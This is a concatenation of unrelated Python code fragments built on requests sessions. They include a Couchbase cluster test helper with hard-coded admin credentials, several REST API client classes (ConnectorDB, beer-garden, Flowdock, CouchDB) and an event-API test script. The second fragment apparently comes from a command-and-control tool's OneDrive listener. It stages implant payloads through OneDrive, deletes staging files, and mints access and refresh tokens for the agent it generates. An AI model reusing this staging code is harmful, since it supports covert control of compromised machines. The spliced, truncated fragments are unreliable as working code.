class CouchbaseServer: """ Installs Couchbase Server on machine host""" def __init__(self, url): self.url = url # Strip http prefix and port to store host host = self.url.replace("http://", "") host = host.replace(":8091", "") self.host = host self.remote_executor = RemoteExecutor(self.host) self._session = Session() self._session.auth = ("Administrator", "password") def delete_buckets(self): count = 0 while count < 3: resp = self._session.get("{}/pools/default/buckets".format(self.url)) log_r(resp) resp.raise_for_status() obj = json.loads(resp.text) existing_bucket_names = [] for entry in obj: existing_bucket_names.append(entry["name"]) log_info("Existing buckets: {}".format(existing_bucket_names)) log_info("Deleting buckets: {}".format(existing_bucket_names)) # HACK around Couchbase Server issue where issuing a bucket delete via REST occasionally returns 500 error delete_num = 0 # Delete existing buckets for bucket_name in existing_bucket_names: resp = self._session.delete("{0}/pools/default/buckets/{1}".format(self.url, bucket_name)) log_r(resp) if resp.status_code == 200: delete_num += 1 if delete_num == len(existing_bucket_names): break else: # A 500 error may have occured, query for buckets and try to delete them again time.sleep(5) count += 1 # Check that max retries did not occur if count == 3: raise CBServerError("Max retries for bucket creation hit. Could not delete buckets!") def wait_for_ready_state(self): """ Verify all server node is in are in a "healthy" state to avoid sync_gateway startup failures Work around for this - https://github.com/couchbase/sync_gateway/issues/1745 """ start = time.time() while True: if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT: raise Exception("Verify Docs Present: TIMEOUT") # Verfy the server is in a "healthy", not "warmup" state try: resp = self._session.get("{}/pools/nodes".format(self.url)) log_r(resp) except ConnectionError: # If bringing a server online, there may be some connnection issues. Continue and try again. time.sleep(1) continue resp_obj = resp.json() all_nodes_healthy = True for node in resp_obj["nodes"]: if node["status"] != "healthy": all_nodes_healthy = False log_info("Node is still not healthy. Status: {} Retrying ...".format(node["status"])) time.sleep(1) if not all_nodes_healthy: continue log_info("All nodes are healthy") log_debug(resp_obj) # All nodes are heathy if it made it to here break def get_available_ram(self): """ Call the Couchbase REST API to get the total memory available on the machine """ resp = self._session.get("{}/pools/default".format(self.url)) resp.raise_for_status() resp_json = resp.json() # Workaround for https://github.com/couchbaselabs/mobile-testkit/issues/709 # where some node report mem_total = 0. Loop over all the nodes and find highest val mem_total_highest = 0 for node in resp_json["nodes"]: mem_total = node["systemStats"]["mem_total"] if mem_total > mem_total_highest: mem_total_highest = mem_total return mem_total_highest def create_buckets(self, bucket_names): """ # Figure out what total ram available is # Divide by number of buckets """ if len(bucket_names) == 0: return log_info("Creating buckets: {}".format(bucket_names)) ram_multiplier = 0.80 total_avail_ram_bytes = self.get_available_ram() total_avail_ram_mb = int(total_avail_ram_bytes / (1024 * 1024)) n1ql_indexer_ram_mb = 512 effective_avail_ram_mb = int(total_avail_ram_mb * ram_multiplier) - n1ql_indexer_ram_mb per_bucket_ram_mb = int(effective_avail_ram_mb / len(bucket_names)) log_info("total_avail_ram_mb: {} effective_avail_ram_mb: {} effective_avail_ram_mb: {}".format(total_avail_ram_mb, effective_avail_ram_mb, effective_avail_ram_mb)) for bucket_name in bucket_names: log_info("Create bucket {} with per_bucket_ram_mb {}".format(bucket_name, per_bucket_ram_mb)) self.create_bucket(bucket_name, per_bucket_ram_mb) def create_bucket(self, name, ramQuotaMB=1024): """ 1. Create CBS bucket via REST 2. Create client connection and poll until bucket is available Catch all connection exception and break when KeyNotFound error is thrown 3. Verify all server nodes are in a 'healthy' state before proceeding Followed the docs below that suggested this approach. http://docs.couchbase.com/admin/admin/REST/rest-bucket-create.html """ log_info("Creating bucket {} with RAM {}".format(name, ramQuotaMB)) data = { "name": name, "ramQuotaMB": str(ramQuotaMB), "authType": "sasl", "proxyPort": "11211", "bucketType": "couchbase", "flushEnabled": "1" } resp = self._session.post("{}/pools/default/buckets".format(self.url), data=data) log_r(resp) resp.raise_for_status() # Create client an retry until KeyNotFound error is thrown start = time.time() while True: if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT: raise Exception("TIMEOUT while trying to create server buckets.") try: bucket = Bucket("couchbase://{}/{}".format(self.host, name)) bucket.get('foo') except ProtocolError: log_info("Client Connection failed: Retrying ...") time.sleep(1) continue except TemporaryFailError: log_info("Failure from server: Retrying ...") time.sleep(1) continue except NotFoundError: log_info("Key not found error: Bucket is ready!") break self.wait_for_ready_state() return name def delete_couchbase_server_cached_rev_bodies(self, bucket): """ Deletes docs that follow the below format _sync:rev:att_doc:34:1-e7fa9a5e6bb25f7a40f36297247ca93e """ b = Bucket("couchbase://{}/{}".format(self.host, bucket)) cached_rev_doc_ids = [] b.n1ql_query("CREATE PRIMARY INDEX ON `{}`".format(bucket)).execute() for row in b.n1ql_query("SELECT meta(`{}`) FROM `{}`".format(bucket, bucket)): if row["$1"]["id"].startswith("_sync:rev"): cached_rev_doc_ids.append(row["$1"]["id"]) log_info("Found temp rev docs: {}".format(cached_rev_doc_ids)) for doc_id in cached_rev_doc_ids: log_debug("Removing: {}".format(doc_id)) b.remove(doc_id) def get_server_docs_with_prefix(self, bucket, prefix): """ Returns server doc ids matching a prefix (ex. '_sync:rev:') """ b = Bucket("couchbase://{}/{}".format(self.host, bucket)) found_ids = [] b.n1ql_query("CREATE PRIMARY INDEX ON `{}`".format(bucket)).execute() for row in b.n1ql_query("SELECT meta(`{}`) FROM `{}`".format(bucket, bucket)): log_info(row) if row["$1"]["id"].startswith(prefix): found_ids.append(row["$1"]["id"]) return found_ids def _get_tasks(self): """ Returns the current tasks from the server """ resp = self._session.get("{}/pools/default/tasks".format(self.url)) log_r(resp) resp.raise_for_status() resp_obj = resp.json() return resp_obj def _wait_for_rebalance_complete(self): """ Polls couchbase server tasks endpoint for any running rebalances. Exits when no rebalances are in running state /pools/default/tasks format: [ { "type": "rebalance", "status": "running", ... } ] """ # Check that rebalance is in the tasks before polling for its completion start = time.time() found_rebalance = False while not found_rebalance: if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT: raise TimeoutError("Did not find rebalance task!") tasks = self._get_tasks() for task in tasks: if task["type"] == "rebalance": log_info("Rebalance found in tasks!") found_rebalance = True if not found_rebalance: log_info("Did not find rebalance task. Retrying.") time.sleep(1) start = time.time() while True: if time.time() - start > keywords.constants.REBALANCE_TIMEOUT_SECS: raise Exception("wait_for_rebalance_complete: TIMEOUT") tasks = self._get_tasks() done_rebalacing = True for task in tasks: # loop through each task and see if any rebalance tasks are running task_type = task["type"] task_status = task["status"] log_info("{} is {}".format(task_type, task_status)) if task_type == "rebalance" and task_status == "running": done_rebalacing = False if done_rebalacing: break time.sleep(1) def add_node(self, server_to_add): """ Add the server_to_add to a Couchbase Server cluster """ if not isinstance(server_to_add, CouchbaseServer): raise TypeError("'server_to_add' must be a 'CouchbaseServer'") log_info("Adding server node {} to cluster ...".format(server_to_add)) data = "hostname={}&user=Administrator&password=password&services=kv".format( server_to_add.host ) # HACK: Retry below addresses the following problem: # 1. Rebalance a node out # 2. Try to to immediately add node back into the cluster # 3. Fails because node is in state where it can't be add in yet # To work around this: # 1. Retry / wait until add node POST command is successful start = time.time() while True: if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT: raise Exception("wait_for_rebalance_complete: TIMEOUT") # Override session headers for this one off request resp = self._session.post( "{}/controller/addNode".format(self.url), headers={"Content-Type": "application/x-www-form-urlencoded"}, data=data ) log_r(resp) # If status of the POST is not 200, retry the request after a second if resp.status_code == 200: log_info("{} added to cluster successfully".format(server_to_add)) break else: log_info("{}: Could not add {} to cluster. Retrying ...".format(resp.status_code, server_to_add)) time.sleep(1) def rebalance_out(self, cluster_servers, server_to_remove): """ Issues a call to the admin_serve to remove a server from a pool. Then wait for rebalance to complete. """ if not isinstance(server_to_remove, CouchbaseServer): raise TypeError("'server_to_remove' must be a 'CouchbaseServer'") # Add all servers except server_to_add to known nodes known_nodes = "knownNodes=" for server in cluster_servers: server = server.replace("http://", "") server = server.replace(":8091", "") known_nodes += "ns_1@{},".format(server) # Add server_to_add to known nodes ejected_node = "ejectedNodes=ns_1@{}".format(server_to_remove.host) data = "{}&{}".format(ejected_node, known_nodes) log_info("Starting rebalance out: {} with nodes {}".format(server_to_remove.host, data)) # Override session headers for this one off request resp = self._session.post( "{}/controller/rebalance".format(self.url), headers={"Content-Type": "application/x-www-form-urlencoded"}, data=data ) log_r(resp) resp.raise_for_status() self._wait_for_rebalance_complete() return True def rebalance_in(self, cluster_servers, server_to_add): """ Adds a server from a pool and waits for rebalance to complete. cluster_servers should be a list of endpoints running Couchbase server. ex. ["http:192.168.33.10:8091", "http:192.168.33.11:8091", ...] """ if not isinstance(server_to_add, CouchbaseServer): raise TypeError("'server_to_add' must be a 'CouchbaseServer'") # Add all servers except server_to_add to known nodes known_nodes = "knownNodes=" for server in cluster_servers: server = server.replace("http://", "") server = server.replace(":8091", "") if server_to_add.host != server: known_nodes += "ns_1@{},".format(server) # Add server_to_add to known nodes data = "{}ns_1@{}".format(known_nodes, server_to_add.host) # Rebalance nodes log_info("Starting rebalance in for {}".format(server_to_add)) log_info("Known nodes: {}".format(data)) # Override session headers for this one off request resp = self._session.post( "{}/controller/rebalance".format(self.url), headers={"Content-Type": "application/x-www-form-urlencoded"}, data=data ) log_r(resp) resp.raise_for_status() self._wait_for_rebalance_complete() return True def recover(self, server_to_recover): if not isinstance(server_to_recover, CouchbaseServer): raise TypeError("'server_to_add' must be a 'CouchbaseServer'") log_info("Setting recover mode to 'delta' for server {}".format(server_to_recover.host)) data = "otpNode=ns_1@{}&recoveryType=delta".format(server_to_recover.host) # Override session headers for this one off request resp = self._session.post( "{}/controller/setRecoveryType".format(self.url), headers={"Content-Type": "application/x-www-form-urlencoded"}, data=data ) log_r(resp) resp.raise_for_status() # TODO reset Quota def start(self): """Starts a running Couchbase Server via 'service couchbase-server start'""" command = "sudo service couchbase-server start" self.remote_executor.must_execute(command) self.wait_for_ready_state() def _verify_stopped(self): """Polls until the server url is unreachable""" start = time.time() while True: if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT: raise TimeoutError("Waiting for server to be unreachable but it never was!") try: resp = self._session.get("{}/pools".format(self.url)) log_r(resp) resp.raise_for_status() except ConnectionError: # This is expected and used to determine if a server node has gone offline break except HTTPError as e: # 500 errors may happen as a result of the node going down log_error(e) continue time.sleep(1) def stop(self): """Stops a running Couchbase Server via 'service couchbase-server stop'""" command = "sudo service couchbase-server stop" self.remote_executor.must_execute(command) self._verify_stopped()
content = s.get(item['@microsoft.graph.downloadUrl']).content lang, return_val = self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0] message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format(base_folder, staging_folder, agent_name, str(len(return_val))) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name)) s.put("%s/drive/root:/%s/%s/%s_2.txt:/content" % (base_url, base_folder, staging_folder, agent_name), data=return_val) message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name)) s.delete("%s/drive/items/%s" % (base_url, item['id'])) if stage == '3': #Download stage 3, upload stage 4 (full agent code) message = "[*] Downloading {}/{}/{}, {} bytes".format(base_folder, staging_folder, item['name'], item['size']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name)) content = s.get(item['@microsoft.graph.downloadUrl']).content lang, return_val = self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0] session_key = self.mainMenu.agents.agents[agent_name]['sessionKey'] agent_token = renew_token(client_id, token['refresh_token']) #Get auth and refresh tokens for the agent to use agent_code = str(self.generate_agent(listener_options, client_id, agent_token['access_token'], agent_token['refresh_token'], redirect_uri, lang))
class DatabaseConnection(object): def __init__(self, user_or_apikey=None, user_password=None, url="https://connectordb.com"): # Set up the API URL if not url.startswith("http"): url = "https://" + url if not url.endswith("/"): url = url + "/" self.baseurl = url self.url = urljoin(url, "/api/v1/") # Set up a session, which allows us to reuse connections self.r = Session() self.r.headers.update({'content-type': 'application/json'}) # Prepare the websocket self.ws = WebsocketHandler(self.url, None) # Set the authentication if any self.setauth(user_or_apikey, user_password) # Now set up the login path so we know what we're logged in as if user_password is not None: self.path = user_or_apikey + "/user" else: self.path = self.ping() def setauth(self, user_or_apikey=None, user_password=None): """ setauth sets the authentication header for use in the session. It is for use when apikey is updated or something of the sort, such that there is a seamless experience. """ auth = None if user_or_apikey is not None: # ConnectorDB allows login using both basic auth or an apikey url param. # The python client uses basic auth for all logins if user_password is None: # Login by api key - the basic auth login uses "" user and # apikey as password user_password = user_or_apikey user_or_apikey = "" auth = HTTPBasicAuth(user_or_apikey, user_password) self.r.auth = auth # Set the websocket's authentication self.ws.setauth(auth) def close(self): """Closes the active connections to ConnectorDB""" self.r.close() def handleresult(self, r): """Handles HTTP error codes for the given request Raises: AuthenticationError on the appropriate 4** errors ServerError if the response is not an ok (2**) Arguments: r -- The request result """ if r.status_code >= 400 and r.status_code < 500: msg = r.json() raise AuthenticationError(str(msg["code"]) + ": " + msg["msg"] + " (" + msg["ref"] + ")") elif r.status_code > 300: err = None try: msg = r.json() err = ServerError(str(msg["code"]) + ": " + msg["msg"] + " (" + msg["ref"] + ")") except: raise ServerError( "Server returned error, but did not give a valid error message") raise err return r def ping(self): """Attempts to ping the server using current credentials, and responds with the path of the currently authenticated device""" return self.handleresult(self.r.get(self.url, params={"q": "this"})).text def query(self, query_type, query=None): """Run the given query on the connection (POST request to /query)""" return self.handleresult(self.r.post(urljoin(self.url + "query/", query_type), data=json.dumps(query))).json() def create(self, path, data=None): """Send a POST CRUD API request to the given path using the given data which will be converted to json""" return self.handleresult(self.r.post(urljoin(self.url + CRUD_PATH, path), data=json.dumps(data))) def read(self, path, params=None): """Read the result at the given path (GET) from the CRUD API, using the optional params dictionary as url parameters.""" return self.handleresult(self.r.get(urljoin(self.url + CRUD_PATH, path), params=params)) def update(self, path, data=None): """Send an update request to the given path of the CRUD API, with the given data dict, which will be converted into json""" return self.handleresult(self.r.put(urljoin(self.url + CRUD_PATH, path), data=json.dumps(data))) def delete(self, path): """Send a delete request to the given path of the CRUD API. This deletes the object. Or at least tries to.""" return self.handleresult(self.r.delete(urljoin(self.url + CRUD_PATH, path))) def get(self, path, params=None): """Sends a get request to the given path in the database and with optional URL parameters""" return self.handleresult(self.r.get(urljoin(self.url, path), params=params)) def subscribe(self, stream, callback, transform=""): """Subscribe to the given stream with the callback""" return self.ws.subscribe(stream, callback, transform) def unsubscribe(self, stream, transform=""): """Unsubscribe from the given stream""" return self.ws.unsubscribe(stream, transform) def wsdisconnect(self): """Disconnects the websocket""" self.ws.disconnect()
class RestClient(object): """Simple Rest Client for communicating to with beer-garden. The is the low-level client responsible for making the actual REST calls. Other clients (e.g. :py:class:`brewtils.rest.easy_client.EasyClient`) build on this by providing useful abstractions. :param bg_host: beer-garden REST API hostname. :param bg_port: beer-garden REST API port. :param ssl_enabled: Flag indicating whether to use HTTPS when communicating with beer-garden. :param api_version: The beer-garden REST API version. Will default to the latest version. :param logger: The logger to use. If None one will be created. :param ca_cert: beer-garden REST API server CA certificate. :param client_cert: The client certificate to use when making requests. :param url_prefix: beer-garden REST API Url Prefix. :param ca_verify: Flag indicating whether to verify server certificate when making a request. :param username: Username for Beergarden authentication :param password: Password for Beergarden authentication :param access_token: Access token for Beergarden authentication :param refresh_token: Refresh token for Beergarden authentication :param client_timeout: Max time to will wait for server response """ # The Latest Version Currently released LATEST_VERSION = 1 JSON_HEADERS = {'Content-type': 'application/json', 'Accept': 'text/plain'} def __init__(self, bg_host=None, bg_port=None, ssl_enabled=False, api_version=None, logger=None, ca_cert=None, client_cert=None, url_prefix=None, ca_verify=True, **kwargs): bg_host = bg_host or kwargs.get('host') if not bg_host: raise ValueError('Missing keyword argument "bg_host"') bg_port = bg_port or kwargs.get('port') if not bg_port: raise ValueError('Missing keyword argument "bg_port"') self.logger = logger or logging.getLogger(__name__) # Configure the session to use when making requests self.session = Session() timeout = kwargs.get('client_timeout', None) if timeout == -1: timeout = None # Having two is kind of strange to me, but this is what Requests does self.session.mount('https://', TimeoutAdapter(timeout=timeout)) self.session.mount('http://', TimeoutAdapter(timeout=timeout)) if not ca_verify: urllib3.disable_warnings() self.session.verify = False elif ca_cert: self.session.verify = ca_cert if client_cert: self.session.cert = client_cert self.username = kwargs.get('username', None) self.password = kwargs.get('password', None) self.access_token = kwargs.get('access_token', None) self.refresh_token = kwargs.get('refresh_token', None) # Configure the beer-garden URLs scheme = 'https' if ssl_enabled else 'http' self.base_url = ( '%s://%s:%s%s' % (scheme, bg_host, bg_port, normalize_url_prefix(url_prefix))) self.version_url = self.base_url + 'version' self.config_url = self.base_url + 'config' api_version = api_version or self.LATEST_VERSION if api_version == 1: self.system_url = self.base_url + 'api/v1/systems/' self.instance_url = self.base_url + 'api/v1/instances/' self.command_url = self.base_url + 'api/v1/commands/' self.request_url = self.base_url + 'api/v1/requests/' self.queue_url = self.base_url + 'api/v1/queues/' self.logging_config_url = self.base_url + 'api/v1/config/logging/' self.job_url = self.base_url + 'api/v1/jobs/' self.token_url = self.base_url + 'api/v1/tokens/' self.user_url = self.base_url + 'api/v1/users/' self.event_url = self.base_url + 'api/vbeta/events/' else: raise ValueError("Invalid beer-garden API version: %s" % api_version) @enable_auth def get_version(self, **kwargs): """Perform a GET to the version URL :param kwargs: Parameters to be used in the GET request :return: The request response """ return self.session.get(self.version_url, params=kwargs) @enable_auth def get_config(self, **kwargs): """Perform a GET to the config URL :param kwargs: Passed to underlying Requests method :return: The request response """ return self.session.get(self.config_url, **kwargs) @enable_auth def get_logging_config(self, **kwargs): """Perform a GET to the logging config URL :param kwargs: Parameters to be used in the GET request :return: The request response """ return self.session.get(self.logging_config_url, params=kwargs) @enable_auth def get_systems(self, **kwargs): """Perform a GET on the System collection URL :param kwargs: Parameters to be used in the GET request :return: The request response """ return self.session.get(self.system_url, params=kwargs) @enable_auth def get_system(self, system_id, **kwargs): """Performs a GET on the System URL :param system_id: ID of system :param kwargs: Parameters to be used in the GET request :return: Response to the request """ return self.session.get(self.system_url + system_id, params=kwargs) @enable_auth def post_systems(self, payload): """Performs a POST on the System URL :param payload: New request definition :return: Response to the request """ return self.session.post(self.system_url, data=payload, headers=self.JSON_HEADERS) @enable_auth def patch_system(self, system_id, payload): """Performs a PATCH on a System URL :param system_id: ID of system :param payload: The update specification :return: Response """ return self.session.patch(self.system_url + str(system_id), data=payload, headers=self.JSON_HEADERS) @enable_auth def delete_system(self, system_id): """Performs a DELETE on a System URL :param system_id: The ID of the system to remove :return: Response to the request """ return self.session.delete(self.system_url + system_id) @enable_auth def get_instance(self, instance_id): """Performs a GET on the Instance URL :param instance_id: ID of instance :return: Response to the request """ return self.session.get(self.instance_url + instance_id) @enable_auth def patch_instance(self, instance_id, payload): """Performs a PATCH on the instance URL :param instance_id: ID of instance :param payload: The update specification :return: Response """ return self.session.patch(self.instance_url + str(instance_id), data=payload, headers=self.JSON_HEADERS) @enable_auth def delete_instance(self, instance_id): """Performs a DELETE on an Instance URL :param instance_id: The ID of the instance to remove :return: Response to the request """ return self.session.delete(self.instance_url + instance_id) @enable_auth def get_commands(self): """Performs a GET on the Commands URL""" return self.session.get(self.command_url) @enable_auth def get_command(self, command_id): """Performs a GET on the Command URL :param command_id: ID of command :return: Response to the request """ return self.session.get(self.command_url + command_id) @enable_auth def get_requests(self, **kwargs): """Performs a GET on the Requests URL :param kwargs: Parameters to be used in the GET request :return: Response to the request """ return self.session.get(self.request_url, params=kwargs) @enable_auth def get_request(self, request_id): """Performs a GET on the Request URL :param request_id: ID of request :return: Response to the request """ return self.session.get(self.request_url + request_id) @enable_auth def post_requests(self, payload, **kwargs): """Performs a POST on the Request URL Args: payload: New request definition kwargs: Extra request parameters Keyword Args: blocking: Wait for request to complete timeout: Maximum seconds to wait Returns: Response to the request """ return self.session.post(self.request_url, data=payload, headers=self.JSON_HEADERS, params=kwargs) @enable_auth def patch_request(self, request_id, payload): """Performs a PATCH on the Request URL :param request_id: ID of request :param payload: New request definition :return: Response to the request """ return self.session.patch(self.request_url + str(request_id), data=payload, headers=self.JSON_HEADERS) @enable_auth def post_event(self, payload, publishers=None): """Performs a POST on the event URL :param payload: New event definition :param publishers: Array of publishers to use :return: Response to the request """ return self.session.post( self.event_url, data=payload, headers=self.JSON_HEADERS, params={'publisher': publishers} if publishers else None) @enable_auth def get_queues(self): """Performs a GET on the Queues URL :return: Response to the request """ return self.session.get(self.queue_url) @enable_auth def delete_queues(self): """Performs a DELETE on the Queues URL :return: Response to the request """ return self.session.delete(self.queue_url) @enable_auth def delete_queue(self, queue_name): """Performs a DELETE on a specific Queue URL :return: Response to the request """ return self.session.delete(self.queue_url + queue_name) @enable_auth def get_jobs(self, **kwargs): """Performs a GET on the Jobs URL. Returns: Response to the request """ return self.session.get(self.job_url, params=kwargs) @enable_auth def get_job(self, job_id): """Performs a GET on the Job URL :param job_id: ID of job :return: Response to the request """ return self.session.get(self.job_url + job_id) @enable_auth def post_jobs(self, payload): """Performs a POST on the Job URL :param payload: New job definition :return: Response to the request """ return self.session.post(self.job_url, data=payload, headers=self.JSON_HEADERS) @enable_auth def patch_job(self, job_id, payload): """Performs a PATCH on the Job URL :param job_id: ID of request :param payload: New job definition :return: Response to the request """ return self.session.patch(self.job_url + str(job_id), data=payload, headers=self.JSON_HEADERS) @enable_auth def delete_job(self, job_id): """Performs a DELETE on a Job URL :param job_id: The ID of the job to remove :return: Response to the request """ return self.session.delete(self.job_url + job_id) @enable_auth def get_user(self, user_identifier): """Performs a GET on the specific User URL :return: Response to the request :param user_identifier: ID or username of User """ return self.session.get(self.user_url + user_identifier) def get_tokens(self, username=None, password=None): """Use a username and password to get access and refresh tokens Args: username: Beergarden username password: Beergarden password Returns: Response object """ response = self.session.post(self.token_url, headers=self.JSON_HEADERS, data=json.dumps({ 'username': username or self.username, 'password': password or self.password })) if response.ok: response_data = response.json() self.access_token = response_data['token'] self.refresh_token = response_data['refresh'] self.session.headers[ 'Authorization'] = 'Bearer ' + self.access_token return response def refresh(self, refresh_token=None): """Use a refresh token to obtain a new access token Args: refresh_token: Refresh token to use Returns: Response object """ refresh_token = refresh_token or self.refresh_token response = self.session.get(self.token_url + refresh_token) if response.ok: response_data = response.json() self.access_token = response_data['token'] self.session.headers[ 'Authorization'] = 'Bearer ' + self.access_token return response
class Api: """An API with url `base_url`. If `token_provider` is specified, all requests will be authenticated with the access token it provides. """ def __init__( self, base_url: str, token_provider: Optional[TokenProvider] = None, retry: Optional[ApiRetry] = ApiRetry(), ) -> None: self.base_url = base_url if base_url.endswith("/") else f"{base_url}/" # Initialize session self.session = Session() self.session.auth = BearerTokenAuth(token_provider) if token_provider else None self.session.headers.update({"Cache-Control": "no-cache"}) self.session.hooks = {"response": self._log_response} # type: ignore # Attach retry adapter if retry: adapter = HTTPAdapter(max_retries=retry) self.session.mount("http://", adapter) self.session.mount("https://", adapter) def _url(self, uri: str) -> str: return f"{self.base_url}{uri}" def _log_response(self, response: Response, *args, **kwargs) -> None: t = response.elapsed.total_seconds() logger.debug( f"Called {response.request.method} {response.url} with body" # type: ignore f" {response.request.body} ({t} s)" ) def _process_response(self, response: Response) -> Dict: try: # Raise any error response.raise_for_status() except HTTPError: # Catch the error, to log the response's message, and reraise # Try to decode the response as json, else fall back to raw text response_json = self._get_json(response) msg = ( response_json.get("message") if isinstance(response_json, dict) else response_json or response.text ) logger.debug(f"HTTP Error: {response.reason} - {msg}") raise # Return json, if any return self._get_json(response) def _get_json(self, response: Response) -> Dict: try: return response.json() except ValueError: return {} def get(self, uri: str, params: Optional[Dict] = None, **kwargs) -> Dict: """Sends a GET request""" response = self.session.get(url=self._url(uri), params=params, **kwargs) return self._process_response(response) def raw_post( self, uri: str, data: Optional[Dict] = None, json: Optional[Dict] = None, **kwargs ) -> requests.Response: """Sends a POST request without processing response""" return self.session.post(url=self._url(uri), data=data, json=json, **kwargs) def post(self, uri: str, data: Optional[Dict] = None, json: Optional[Dict] = None, **kwargs) -> Dict: """Sends a POST request""" response = self.session.post(url=self._url(uri), data=data, json=json, **kwargs) return self._process_response(response) def put(self, uri: str, data: Optional[Dict] = None, json: Optional[Dict] = None, **kwargs) -> Dict: """Sends a PUT request""" response = self.session.put(url=self._url(uri), data=data, json=json, **kwargs) return self._process_response(response) def delete(self, uri: str, **kwargs) -> Dict: """Sends a DELETE request""" response = self.session.delete(url=self._url(uri), **kwargs) return self._process_response(response)
class Flowdock(object): """Simple wrapper for Flowdock REST API.""" API_URL = "https://api.flowdock.com" def __init__(self, api_key, debug=False, print_function=None): """Initialize Flowdock API wrapper. debug -- Print debug info if True print_function -- Use this function to print debug info. By default use python builtin print. Mainly for using click.echo without requiring click as dependency. """ self.session = Session() # requests accepts http basic auth as tuple (user, pass), however, # Flowdoc uses only api key as username without password self.session.auth = (api_key, None) self.print_debug = debug self.print = print_function if print_function else print def debug(self, message): if self.print_debug: self.print(message) def list_organizations(self): """List the organizations this user has access to""" url = "{}/organizations".format(self.API_URL) self.debug("Sending GET request to URL {}".format(url)) res = self.session.get(url) res.raise_for_status() return res.json() def find_user_orgs(self, email): """Find organizations given user belongs to""" orgs = self.list_organizations() return [org for org in orgs if Flowdock.user_in_org(email, org)] @staticmethod def user_in_org(email, org): """Chek if user is part of organization""" for user in org['users']: if user['email'] == email: return True return False def delete_user_from_org(self, user, org): """Delete given user from given organization.""" url = "{}/organizations/{}/users/{}".format( self.API_URL, org['parameterized_name'], user['id']) self.debug("Sending DELETE request to url {}".format(url)) res = self.session.delete(url) res.raise_for_status() def find_inactive_in_org(self, org, days=90, null=False): """Find inactive users in Flowdock organization Flowdock has unofficial API /organizations/:organization/audits/users/ that list when users have been last active in that organization. It is undocumented but seems to work fairly well. This method lists users that have not been active during last days. Arguments: org -- parameterized flowdock organization name to check Keyword arguments: days -- how many days since last activity is considered inactive. null -- list users whose last activity date is not known for some reason. """ url = "{}/organizations/{}/audits/users/".format( self.API_URL, org) self.debug("Sending GET request to URL {}".format(url)) res = self.session.get(url) res.raise_for_status() users = res.json() if null: return [x for x in users if x['accessed_at'] is None] limit = datetime.now() - timedelta(days=days) users = [x for x in users if x['accessed_at'] is not None] users = [x for x in users if _last_access_before(x, limit)] return users def close(self): """Close the http session used internally. This method should be called when the API object is not needed anymore to free resources from client and server. """ self.session.close()
}).json()) print(s_3.get(api_adr + 'invites').json()['invites'][-1]) event_j = s_2.get( api_adr + 'event/{}'.format(event_json['event_id'])).json()['event'] event_j['event_description'] = 'This is new desc' event_j['event_timezone'] = None print( 'EDIT EVENT', s_2.post(api_adr + 'event/{}'.format(event_json['event_id']), json=event_j).json()) print(s_3.get(api_adr + 'invites').json()['invites'][-1]) print( s_3.post(api_adr + 'invite/{}/attendance'.format(invite['invite_id']), json={ 'attendance': 1 }).json()) print(s_3.get(api_adr + 'invites').json()['invites'][-1]) print( s_3.post(api_adr + 'invite/{}/restore'.format(invite['invite_id'])).json()) print(s_3.get(api_adr + 'invites').json()['invites'][-1]) print( 'DELETE EVENT', s_1.delete(api_adr + 'event/{}'.format(event_json['event_id'])).json()) print('GET EVENTS', s_1.get(api_adr + 'calendar/{}'.format(c_1)).json())
class Server(object): def __init__(self, host="http://localhost:5984", auth=None, trust_env=False): self.host = host self.session = Session() # trust env make use of get_netrc that is soooo slow self.session.trust_env = trust_env self.session.auth = auth self.session.headers = { "Content-Type": "application/json", } def __getitem__(self, name): return Database(name, server=self, create=False) def __len__(self): return len(self.get_databases()) def __nonzero__(self): """ Returns if server is available """ try: self.session.head(self.host) return True except: return False def __delitem__(self, name): self.delete_db(name) def __contains__(self, db_or_name): """ Tests if the database exists """ name = db_or_name if isinstance(db_or_name, Database): name = db_or_name.name request = self.session.head(self.host + "/" + name) if request.status_code == 404: return False return True def __iter__(self): """ Iterates over all the databases and returns Database instances """ return (Database(name, server=self) for name in self.get_databases()) def uuids(self, count=1): """ Returns a a lists of "count" uuids generated in the server """ request = self.session.get(self.host + "/_uuids", params={"count": count}) return request.json()["uuids"] def get_databases(self): request = self.session.get(self.host + "/_all_dbs") return request.json() def version(self): request = self.session.get(self.host) return request.json()["version"] def create_db(self, name): """ Try to create a new database or raise error Posible Errors: DBExists, AuthFail """ return Database(name, server=self, create=True) def delete_db(self, db_or_name): """ Try to delete database or raise error Posible Errors: DBNotExists, AuthFail """ name = db_or_name if isinstance(db_or_name, Database): name = db_or_name.name request = self.session.delete(self.host + "/" + name) if not request.ok: if request.status_code == 401: raise excepts.AuthFail elif request.status_code == 404: raise excepts.DBNotExists raise Exception(request.status_code)